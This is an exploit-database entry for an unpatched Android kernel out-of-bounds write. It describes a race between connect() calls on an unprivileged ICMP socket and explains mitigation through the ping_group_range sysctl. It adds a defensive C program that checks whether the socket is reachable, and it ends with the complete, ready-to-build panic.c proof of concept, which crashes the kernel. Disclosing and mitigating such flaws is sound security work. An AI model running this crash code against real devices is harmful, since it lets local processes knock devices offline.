Vendor: Kernel
By: Daniel Jiang
CVSS: 9.8 (HIGH)
CWE: CWE-787 (Out-of-bounds write)
Product Name: Kernel
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Year: 2020

Android Kernel Crash PoC

This PoC triggers an out-of-bounds write in the Android kernel's handling of ICMP datagram ("ping") sockets. It opens a single socket with socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP) and then races two threads calling connect() on it through one shared sockaddr_in: a worker thread repeatedly connects with sin_family set to 0 (AF_UNSPEC, which the kernel treats as a request to disconnect the socket), while the main thread connects to loopback with sin_family set to 0x1a, an address family the IPv4 ICMP socket does not handle, and then flips the field back to 0. A single connect() with sin_family = 0 is an ordinary disconnect and does not crash anything on its own; it is the interleaving of the disconnect path with the second connect() that drives the kernel into the out-of-bounds write and a kernel panic. No privilege is needed beyond being allowed to create a ping socket, so a local process that can do that can take the device down.

Mitigation:

Checking sin_family in user space before calling connect() is not a mitigation: the defect is in the kernel, and a malicious or compromised local process will simply not perform the check. With no kernel patch recorded for this entry, the only defensive control is to limit who may open IPPROTO_ICMP datagram sockets at all, via the net.ipv4.ping_group_range sysctl ("low high"): the kernel refuses socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP) with EACCES for any process none of whose group IDs falls inside that range. Mainline Linux ships the range disabled ("1 0", low greater than high); Android opens it to all groups so that unprivileged apps can ping, which is what makes this PoC reachable from an ordinary app. Narrowing the range on an Android build removes ICMP sockets from the excluded apps, so it is a trade-off rather than a free fix, and it must be set on every boot because the value does not persist.
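A precondition check for the mitigation above, added here as an example; it is not part of Daniel Jiang's PoC or the original page. It interprets the net.ipv4.ping_group_range value the way the kernel applies it (a "low high" pair that is disabled when low is greater than high, matched against the caller's effective and supplementary group IDs), then probes the socket() call the PoC relies on. The function names and the sample sysctl strings are my own. Run it as the account you care about: if either check reports the ping socket as reachable, an unfixed kernel is exposed to this PoC from that account.

```c
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Interpret a net.ipv4.ping_group_range value ("low high") for one gid.
 * Returns 1 if gid is inside the range, 0 if it is outside or the range is
 * disabled (low > high, e.g. the mainline default "1 0"), -1 if unparsable. */
int gid_in_ping_group_range(const char *sysctl_value, gid_t gid)
{
    unsigned long lo, hi;

    if (sysctl_value == NULL || sscanf(sysctl_value, "%lu %lu", &lo, &hi) != 2)
        return -1;
    if (lo > hi)
        return 0;
    return ((unsigned long)gid >= lo && (unsigned long)gid <= hi) ? 1 : 0;
}

/* The kernel admits the socket if any of the caller's group IDs (effective
 * gid or a supplementary group) is in range. Same return convention. */
int any_gid_in_ping_group_range(const char *sysctl_value,
                                const gid_t *gids, size_t ngids)
{
    size_t i;

    if (gid_in_ping_group_range(sysctl_value, 0) == -1)
        return -1;
    for (i = 0; i < ngids; i++)
        if (gid_in_ping_group_range(sysctl_value, gids[i]) == 1)
            return 1;
    return 0;
}

/* Empirical probe: open the same socket the PoC uses and close it again.
 * Returns 1 if it opens, 0 if the kernel refused it with EACCES (no gid in
 * ping_group_range), -1 for any other error (e.g. a seccomp filter). */
int ping_socket_openable(void)
{
    int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);

    if (fd >= 0) {
        close(fd);
        return 1;
    }
    return (errno == EACCES) ? 0 : -1;
}

int main(void)
{
    char value[64] = "";           /* sysctl text, read from /proc */
    gid_t gids[256];               /* effective gid + supplementary groups */
    int n, policy, probe;
    FILE *f = fopen("/proc/sys/net/ipv4/ping_group_range", "r");

    if (f != NULL) {
        if (fgets(value, sizeof value, f) == NULL)
            value[0] = '\0';
        fclose(f);
    }
    gids[0] = getegid();
    n = getgroups(255, gids + 1);
    if (n < 0)
        n = 0;

    policy = any_gid_in_ping_group_range(value, gids, (size_t)n + 1);
    probe = ping_socket_openable();

    printf("ping_group_range: %s", value[0] ? value : "(unreadable)\n");
    printf("policy check    : %s\n",
           policy == 1 ? "a gid of this process is in range (ping sockets allowed)" :
           policy == 0 ? "no gid of this process is in range" :
                         "could not parse the sysctl value");
    printf("socket() probe  : %s\n",
           probe == 1 ? "IPPROTO_ICMP socket opens, PoC reachable from here" :
           probe == 0 ? "EACCES, blocked by ping_group_range" :
                        "refused for another reason");
    /* Non-zero exit when the PoC's trigger path is reachable, for scripting. */
    return (policy == 1 || probe == 1) ? 2 : 0;
}
```

The policy check and the probe are deliberately separate: the sysctl tells you what the configured range is, while the probe catches controls the sysctl does not show, such as a seccomp profile or a sandbox that blocks socket() outright.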
Source

Exploit-DB raw data:

// Source: https://raw.githubusercontent.com/danieljiang0415/android_kernel_crash_poc/master/panic.c
// Build: gcc panic.c -o panic -lpthread

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

static int sockfd = 0;
/* Shared and deliberately unsynchronised: both threads race on this address. */
static struct sockaddr_in addr = {0};

/* Worker thread: keep disconnecting the socket by calling connect() with
 * sin_family = 0 (AF_UNSPEC). The original harness fuzzed random families
 * here (rand() % 42); the constant 0 is enough to reproduce the crash. */
static void *fuzz(void *param)
{
    (void)param;
    while (1) {
        addr.sin_family = 0; // rand() % 42;
        printf("sin_family1 = %04x\n", (unsigned)addr.sin_family);
        connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
    }
    return NULL;
}

int main(int argc, char **argv)
{
    (void)argc;
    (void)argv;

    /* Unprivileged ICMP ("ping") datagram socket; creation only succeeds if
     * one of the caller's group IDs is inside net.ipv4.ping_group_range. */
    sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
    if (sockfd < 0) {
        perror("socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP)");
        return 1;
    }

    pthread_t thrd;
    pthread_create(&thrd, NULL, fuzz, NULL);

    /* Main thread: connect to loopback with an address family the IPv4 ICMP
     * socket does not handle (0x1a), then flip the family back to 0, racing
     * the worker's disconnects until the kernel panics. */
    while (1) {
        addr.sin_family = 0x1a; // rand() % 42;
        addr.sin_port = 0;
        addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
        connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
        addr.sin_family = 0;
    }
    return 0;
}